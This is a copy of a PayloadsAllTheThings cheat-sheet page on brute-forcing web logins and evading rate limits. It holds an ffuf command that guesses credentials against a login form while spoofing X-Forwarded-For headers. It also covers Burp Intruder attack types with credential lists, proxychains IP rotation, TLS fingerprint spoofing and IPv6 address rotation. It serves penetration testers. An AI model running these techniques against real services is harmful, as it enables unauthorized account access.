index.md (6252B)
1 --- 2 title: "Brute Force & Rate Limit" 3 topic: "Brute Force Rate Limit" 4 topicSlug: "brute-force-rate-limit" 5 sourcePath: "Brute Force Rate Limit/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Brute%20Force%20Rate%20Limit/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Brute Force & Rate Limit 12 13 ## Summary 14 15 * [Tools](#tools) 16 * [Bruteforce](#bruteforce) 17 * [Burp Suite Intruder](#burp-suite-intruder) 18 * [FFUF](#ffuf) 19 * [Rate Limit](#rate-limit) 20 * [TLS Stack - JA3](#tls-stack---ja3) 21 * [Network IPv4](#network-ipv4) 22 * [Network IPv6](#network-ipv6) 23 * [References](#references) 24 25 ## Tools 26 27 * [ZephrFish/OmniProx](https://github.com/ZephrFish/OmniProx) - IP Rotation from different providers - Like FireProx but for GCP, Azure, Alibaba and CloudFlare. 28 * [ddd/gpb](https://github.com/ddd/gpb) - Bruteforcing the phone number of any Google user while rotating IPv6 addresses. 29 * [ffuf/ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go. 30 * [PortSwigger/Burp Suite](https://portswigger.net/burp) - The class-leading vulnerability scanning, penetration testing, and web app security platform. 31 * [lwthiker/curl-impersonate](https://github.com/lwthiker/curl-impersonate) - A special build of curl that can impersonate Chrome & Firefox. 32 33 ## Bruteforce 34 35 In a web context, brute-forcing refers to the method of attempting to gain unauthorized access to web applications, particularly through login forms or other user input fields. Attackers systematically input numerous combinations of credentials or other values (e.g., iterating through numeric ranges) to exploit weak passwords or inadequate security measures. 36 37 For instance, they might submit thousands of username and password combinations or guess security tokens by iterating through a range, such as 0 to 10,000. This method can lead to unauthorized access and data breaches if not mitigated effectively. 38 39 Countermeasures like rate limiting, account lockout policies, CAPTCHA, and strong password requirements are essential to protect web applications from such brute-force attacks. 40 41 ### Burp Suite Intruder 42 43 * **Sniper attack**: target a single position (one variable) while cycling through one payload set. 44 45 ```ps1 46 47 Username: password 48 Username1:Password1 49 Username1:Password2 50 Username1:Password3 51 Username1:Password4 52 ``` 53 54 * **Battering ram attack**: send the same payload to all marked positions at once by using a single payload set. 55 56 ```ps1 57 Username1:Username1 58 Username2:Username2 59 Username3:Username3 60 Username4:Username4 61 ``` 62 63 * **Pitchfork attack**: use different payload lists in parallel, combining the nth entry from each list into one request. 64 65 ```ps1 66 Username1:Password1 67 Username2:Password2 68 Username3:Password3 69 Username4:Password4 70 ``` 71 72 * **Cluster bomb attack**: iterate through all combinations of multiple payload sets. 73 74 ```ps1 75 Username1:Password1 76 Username1:Password2 77 Username1:Password3 78 Username1::Password4 79 80 Username2:Password1 81 Username2:Password2 82 Username2:Password3 83 Username2:Password4 84 ``` 85 86 ### FFUF 87 88 ```bash 89 ffuf -w usernames.txt:USER -w passwords.txt:PASS \ 90 -u https://target.tld/login \ 91 -X POST -d "username=USER&password=PASS" \ 92 -H "Content-Type: application/x-www-form-urlencoded" \ 93 -H "X-Forwarded-For: FUZZ" -w ipv4-list.txt:FUZZ \ 94 -mc all 95 ``` 96 97 ## Rate Limit 98 99 ### HTTP Pipelining 100 101 HTTP pipelining is a feature of HTTP/1.1 that lets a client send multiple HTTP requests on a single persistent TCP connection without waiting for the corresponding responses first. The client "pipes" requests one after another over the same connection. 102 103 ### TLS Stack - JA3 104 105 JA3 is a method for fingerprinting TLS clients (and JA3S for TLS servers) by hashing the contents of the TLS "hello" messages. It gives a compact identifier you can use to detect, classify, and track clients on the network even when higher-level protocol fields (like HTTP user-agent) are hidden or faked. 106 107 > JA3 gathers the decimal values of the bytes for the following fields in the Client Hello packet; SSL Version, Accepted Ciphers, List of Extensions, Elliptic Curves, and Elliptic Curve Formats. It then concatenates those values together in order, using a "," to delimit each field and a "-" to delimit each value in each field. 108 109 * Burp Suite JA3: `53d67b2a806147a7d1d5df74b54dd049`, `62f6a6727fda5a1104d5b147cd82e520` 110 * Tor Client JA3: `e7d705a3286e19ea42f587b344ee6865` 111 112 **Countermeasures:** 113 114 * Use browser-driven automation (Puppeteer / Playwright) 115 * Spoof TLS handshakes with [lwthiker/curl-impersonate](https://github.com/lwthiker/curl-impersonate) 116 * JA3 randomization plugins for browsers/libraries 117 118 ### Network IPv4 119 120 Use multiple proxies to simulate multiple clients. 121 122 ```bash 123 proxychains ffuf -w wordlist.txt -u https://target.tld/FUZZ 124 ``` 125 126 * Use `random_chain` to rotate each request 127 128 ```ps1 129 random_chain 130 ``` 131 132 * Set the number of proxies to chain per connection to 1. 133 134 ```ps1 135 chain_len = 1 136 ``` 137 138 * Finally, specify the proxies in a configuration file: 139 140 ```ps1 141 # type host port 142 socks5 127.0.0.1 1080 143 socks5 192.168.1.50 1080 144 http proxy1.example.com 8080 145 http proxy2.example.com 8080 146 ``` 147 148 ### Network IPv6 149 150 Many cloud providers, such as Vultr, offer /64 IPv6 ranges, which provide a vast number of addresses (18 446 744 073 709 551 616). This allows for extensive IP rotation during brute-force attacks. 151 152 ## References 153 154 * [Bruteforcing the phone number of any Google user - brutecat - June 9, 2025](https://web.archive.org/web/20250609141236/https://brutecat.com/articles/leaking-google-phones) 155 * [Burp Intruder attack types - PortSwigger - August 19, 2025](https://web.archive.org/web/20260124024947/https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/attack-types) 156 * [Detecting and annoying Burp users - Julien Voisin - May 3, 2021](https://web.archive.org/web/20260102160139/https://dustri.org/b/detecting-and-annoying-burp-users.html) 157 * [OmniProx: Multi-Cloud IP Rotation Made Simple - Andy Gill - September 28, 2025](https://web.archive.org/web/20260215082718/https://blog.zsec.uk/omniprox/)